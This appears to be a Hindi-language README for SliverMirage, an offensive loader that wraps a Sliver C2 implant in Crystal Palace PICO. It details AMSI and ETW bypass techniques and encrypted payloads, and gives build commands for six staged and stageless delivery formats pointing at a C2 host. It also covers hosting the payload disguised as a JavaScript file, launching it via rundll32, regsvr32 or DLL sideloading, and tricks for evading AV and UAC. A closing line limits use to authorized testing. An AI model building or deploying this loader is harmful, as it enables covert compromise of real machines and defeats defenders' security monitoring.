
Sliver C2 के लिए Crystal Palace PICO लोडर — दोहरी-परत AMSI बाइपास, ETW साइलेंसिंग, AES-256-CBC एन्क्रिप्टेड पेलोड, 6 डिलीवरी वैरिएंट
CrystalSliver का एक फोर्क, जो Crystal Palace PICO लोडर को दो-परत वाले AMSI बायपास, ETW साइलेंसिंग, और Sliver C2 के लिए छह डिलीवरी वेरिएंट के साथ विस्तारित करता है।
SliverMirage एक Sliver इम्प्लांट DLL को Crystal Palace PICO वर्चुअलाइजेशन के माध्यम से लपेटता है, फिर इसे एक लोडर के जरिए डिलीवर करता है जो amsi.dll या ntdll.dll को पैच किए बिना AMSI और ETW को बायपास करता है।
एवेज़न स्टैक:
| परत | तकनीक | विवरण |
|---|
| AMSI L1 | CLR स्ट्रिंग करप्शन | LdrRegisterDllNotification clr.dll लोड को इंटरसेप्ट करता है, CLR के GetProcAddress कॉल करने से पहले .rdata में AmsiScanBuffer को करप्ट करता है |
| AMSI L2 | VEH + HWBP | AmsiScanBuffer पर Vectored Exception Handler E_INVALIDARG रिटर्न करता है |
| ETW | HWBP | NtTraceControl पर DR1, STATUS_SUCCESS रिटर्न करता है |
| पेलोड | AES-256-CBC + XOR | BCrypt डिक्रिप्शन, VirtualAlloc(RW) -> VirtualProtect(RX), ज़ीरो RWX |
| वर्चुअलाइजेशन | Crystal Palace PICO | Sliver DLL एक PICO प्रोसेस के अंदर चलता है, जो यूज़रलैंड AV के लिए अदृश्य है |
| फ़ॉर्मेट | फ़ाइल | डिलीवरी | रनटाइम पर C2? |
|---|---|---|---|
exe | स्टेज्ड EXE | C2 वेबसाइट पर EXE + payload.dat | हाँ (HTTPS) |
exe-stageless | स्टेजलेस EXE | एकल EXE | नहीं |
dll | स्टेजलेस DLL | एकल DLL | नहीं |
dll-staged | स्टेज्ड DLL | C2 वेबसाइट पर DLL + payload.dat | हाँ (HTTPS) |
shellcode | स्टेज्ड शेलकोड | .bin + payload.dat | हाँ (HTTPS) |
shellcode-stageless | स्टेजलेस शेलकोड | एकल .bin | नहीं |
स्टेज्ड वेरिएंट रनटाइम पर एक Sliver HTTPS वेबसाइट से एन्क्रिप्टेड PICO डाउनलोड करते हैं। EXE/DLL छोटा (~20 KB) होता है और डिस्क पर कोई पेलोड नहीं रखता।
स्टेजलेस वेरिएंट कंपाइल टाइम पर एन्क्रिप्टेड PICO एम्बेड करते हैं (XOR + AES डबल-लेयर)। डिस्क पर बड़ा होता है लेकिन बीकन कॉलबैक से पहले नेटवर्क गतिविधि शून्य होती है।
x86_64-w64-mingw32-gcc (mingw-w64)nasmpython3 pefile के साथ (pip install pefile)opensslbuild.sh द्वारा ऑटो-प्रोविज़न किया जाता है)बिल्ड स्क्रिप्ट गायब डिपेंडेंसियों को ऑटो-प्रोविज़न करती है (Crystal Palace और Java 17 सहित) और पूरी पाइपलाइन संभालती है: DLL -> Crystal Palace PICO -> एन्क्रिप्ट -> कंपाइल।
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1
# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless
# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll
# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1
# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1
# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless
विकल्प:
--dll <path> — Sliver इम्प्लांट DLL (आवश्यक)--host <ip> — C2 सर्वर IP (स्टेज्ड फॉर्मेट के लिए आवश्यक)--port <port> — C2 पोर्ट (डिफ़ॉल्ट: 443)--path <path> — पेलोड डाउनलोड के लिए URL पथ (डिफ़ॉल्ट: /assets/js/vendor.js)--format <fmt> — आउटपुट फ़ॉर्मेट (डिफ़ॉल्ट: exe)--export <name> — कस्टम DLL एक्सपोर्ट नामयदि आपके पास पहले से Crystal Palace PICO ब्लॉब है:
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1
# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin
# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin
# All targets
make clean
build/payload.dat को Sliver HTTPS वेबसाइट पर अपलोड करें:
sliver > websites add-content --website cover \
--web-path /assets/js/vendor.js \
--content-type application/javascript \
--content build/payload.dat
टार्गेट पर build/csvchelper.exe (या .dll) डिलीवर करें।
एकल फ़ाइल डिलीवरी। किसी C2 वेबसाइट सेटअप की आवश्यकता नहीं है।
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll
या DLL साइडलोडिंग का उपयोग करें (टार्गेट एप्लिकेशन द्वारा लोड किए गए वैध DLL से मेल खाने के लिए नाम बदलें)।
एक्सपोर्ट्स: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc
SliverMirage/
loader/ # Crystal Palace PICO loader (from CrystalSliver)
src/ # Loader C sources + draugr ASM
loader.spec # Crystal Palace linker spec
pico.spec # PICO generation spec
src/
stager_remote.c # Staged EXE
stager_stageless.c # Stageless EXE
stager_remote_dll.c # Staged DLL
stager_stageless_dll.c # Stageless DLL
stager_debug.c # Debug EXE (MessageBox diagnostics)
scripts/
gen_payload.py # AES-256-CBC encrypt (staged)
gen_payload_stageless.py # AES + XOR embed (stageless)
dll_to_shellcode.py # sRDI DLL-to-shellcode converter
resources/
resource.rc # Version info (EXE)
resource_dll.rc # Version info (DLL)
manifest.xml # asInvoker manifest
libtcg.x64.zip # TCG library for Crystal Palace
Makefile
build.sh
kernel32, advapi32, bcrypt — सभी वैध Windows APIsVirtualProtect नहींWinMain एंट्री पॉइंट, -mwindows — कोई कंसोल फ्लैश नहींasInvoker मेनिफेस्ट UAC ह्यूरिस्टिक्स को दबाता हैresource.rc / resource_dll.rc कस्टमाइज़ करेंयह प्रोजेक्ट केवल अधिकृत सुरक्षा परीक्षण, शोध और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन वातावरणों में करें जहाँ आपके पास पेनेट्रेशन परीक्षण करने की स्पष्ट लिखित अनुमति हो। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ्टवेयर के दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेते हैं।
MIT